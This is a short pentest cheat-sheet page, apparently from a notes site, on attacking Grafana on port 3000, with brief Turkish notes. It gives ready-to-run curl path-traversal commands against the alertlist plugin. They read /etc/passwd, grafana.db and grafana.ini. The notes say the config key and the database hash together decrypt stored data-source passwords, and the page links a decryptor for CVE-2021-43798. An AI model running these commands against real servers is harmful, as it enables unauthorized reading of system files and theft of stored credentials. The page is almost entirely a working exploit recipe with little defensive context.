Grafana - 3000

LFI to RCE

curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini

  • Grafana.ini içinde key grafana.db içinde ise password hash var ikisi ile decrypt ediyoruz.

  • Database hash data source tablosunda saklı

Password Decryptor: https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798

PreviousDockerNextMySQL - 3306

Last updated

Was this helpful?